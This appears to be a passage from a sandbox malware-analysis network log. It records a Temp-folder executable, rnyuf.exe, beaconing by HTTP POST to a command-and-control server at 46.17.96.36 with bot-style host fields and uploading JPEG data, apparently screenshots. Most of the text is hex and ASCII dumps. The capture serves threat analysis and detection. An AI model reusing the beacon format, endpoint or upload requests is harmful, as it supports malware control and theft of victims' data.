                                        Aug 29, 2021 22:28:00.963196993 CEST12071OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:00.963255882 CEST12076OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:28:00.963444948 CEST12079OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:28:00.963546038 CEST12092OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:28:00.964066029 CEST12100OUTData Raw: 4e 02 80 38 a7 01 4c 86 ce 97 c2 6b 98 f5 1f fa e4 3f 91 ae 74 f0 ed f5 ae a7 c1 f1 ee 83 53 3f f4 cb fa 1a e6 18 7c c7 eb 5c 14 25 fb fa 8b d0 ea ae ad 42 0f d4 6d 18 a5 c5 18 ae db 9c 37 12 9c 28 c5 00 50 20 a5 a5 c5 2e 3d aa 5b 10 98 a3 14 f0
                                        Data Ascii: N8Lk?tS?|\%Bm7(P .=[xF?AR[i?CU?H=9WeImd[k4>f)w5X*sJ1]/f@7yZKI/&:Z{77?/mZ_Z+
                                        Aug 29, 2021 22:28:01.064990044 CEST12136INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        157192.168.2.44989646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:00.925252914 CEST12038OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:00.996964931 CEST12135INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:00 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        158192.168.2.44989746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.161341906 CEST12137OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:01.233273983 CEST12137INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        159192.168.2.44989846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.340183973 CEST12138OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbd
                                        Host: 46.17.96.36
                                        Content-Length: 110771
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:01.340241909 CEST12138OUTData Raw: 2d 2d 2d 2d 2d 2d 31 61 36 65 65 63 30 39 30 33 62 33 36 31 30 33 63 33 63 38 31 31 61 38 66 61 39 62 30 66 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------1a6eec0903b36103c3c811a8fa9b0fbdContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:01.340504885 CEST12148OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:01.340660095 CEST12151OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:01.375137091 CEST12157OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:01.375277996 CEST12159OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:01.375741959 CEST12171OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:01.375858068 CEST12177OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:01.410290003 CEST12180OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:01.410371065 CEST12182OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:01.410547972 CEST12193OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:28:01.514205933 CEST12250INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        16192.168.2.44975146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:15.672137976 CEST2744OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:15.672533035 CEST2744OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:15.673347950 CEST2754OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:15.673721075 CEST2757OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:15.709050894 CEST2777OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:15.709207058 CEST2782OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:15.745023012 CEST2790OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:15.745372057 CEST2793OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:15.745564938 CEST2809OUTData Raw: 1c a2 16 0a 36 95 e0 48 07 5a bf 79 7f a3 c5 e3 ab fd 76 2d 6e d2 e2 d6 f0 de 6d 48 a1 9c 48 9e 64 12 2a ee 0d 18 1c b3 01 c1 3d 7d 39 a7 ed ea 59 bb 7f 37 e1 b0 4a 85 3b d9 3e a6 24 1a 3c af 15 ec b7 57 16 f6 29 63 70 96 d7 26 e3 7f ee dd b7 e3
                                        Data Ascii: 6HZyv-nmHHd*=}9Y7J;>$<W)cp&V$,Wn|/,76yqs*d$v5U]r;eex+\kl)BD]:'h<7 I\KYhqOU2}.KqcMp4M*R6v6
                                        Aug 29, 2021 22:27:15.745810986 CEST2817OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:15.746072054 CEST2822OUTData Raw: 4a ed e4 67 22 a1 26 6a 7c be b4 86 48 c7 53 58 cd 75 21 ef 51 99 5c f7 a7 c8 68 b0 ef a9 b6 6e a2 5e c2 a3 6d 45 57 a6 2b 1b 24 f7 a3 93 47 22 34 54 12 34 db 54 63 d2 a0 7d 42 43 de a9 d1 4e c9 16 a9 c5 13 35 dc 87 f8 aa 33 2b 9e a4 d3 28 aa b2
                                        Data Ascii: Jg"&j|HSXu!Q\hn^mEW+$G"4T4Tc}BCN53+()E!I>QaNHcMhQIZb%/,~Vfjpv/z+(Q@)-w-%\(RCEP!hPGj(I@Gz-/j
                                        Aug 29, 2021 22:27:15.854780912 CEST2851INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        160192.168.2.44989946.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.374511957 CEST12151OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:01.459302902 CEST12250INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        161192.168.2.44990046.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.609302044 CEST12251OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:01.679158926 CEST12252INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:01 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        162192.168.2.44990146.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:01.805602074 CEST12252OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----1a6eec0903b36103c3c811a8fa9b0fbd
                                        Host: 46.17.96.36
                                        Content-Length: 110771
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:01.805681944 CEST12253OUTData Raw: 2d 2d 2d 2d 2d 2d 31 61 36 65 65 63 30 39 30 33 62 33 36 31 30 33 63 33 63 38 31 31 61 38 66 61 39 62 30 66 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------1a6eec0903b36103c3c811a8fa9b0fbdContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:01.805856943 CEST12263OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:01.805963039 CEST12265OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:01.837874889 CEST12268OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:02.188735962 CEST12272OUTData Raw: 46 29 80 d3 45 3b 14 62 80 b8 dc 51 4b 8a 29 00 94 0a 28 14 00 b4 51 45 30 0a 51 d2 8a 5a 04 14 51 45 00 14 51 45 00 14 51 45 00 14 52 d1 4c 04 a2 94 d2 50 02 8a 28 a2 81 05 14 51 40 05 3a 9b 4e a6 0c 5a 5e 69 29 69 92 2d 25 06 8a 62 0a 28 a2 80
                                        Data Ascii: F)E;bQK)(QE0QZQEQEQERLP(Q@:NZ^i)i-%b((K@@)ER@E-QEQE'j)h01))hc(E-E'zZ@%-PEPEPKIE-QLAE(ER(!%QE'z-&)QEQEQE((E-(
                                        Aug 29, 2021 22:28:02.220701933 CEST12273OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:02.221143961 CEST12274OUTData Raw: 2c 74 8d 3a f3 42 b5 bd fe c1 53 63 75 6b 73 3d ee a7 1c d3 6d d3 e5 52 fb 22 19 72 a3 01 63 c0 70 cc db f8 3c 8a bd ae 69 71 5c 68 89 75 77 a3 98 21 4d 06 c5 e0 d5 de 59 00 69 f6 44 a2 21 ce cc 60 9c ae 37 0c 16 ce 38 af 3e bc d3 26 b0 96 38 ee
                                        Data Ascii: ,t:BScuks=mR"rcp<iq\huw!MYiD!`78>&8HRt:S"1QZEt/=Bu3#<ipV*33;71I2J[}0~NI<sZR;UX1nL]E$Du\Pyx{RO[$yc
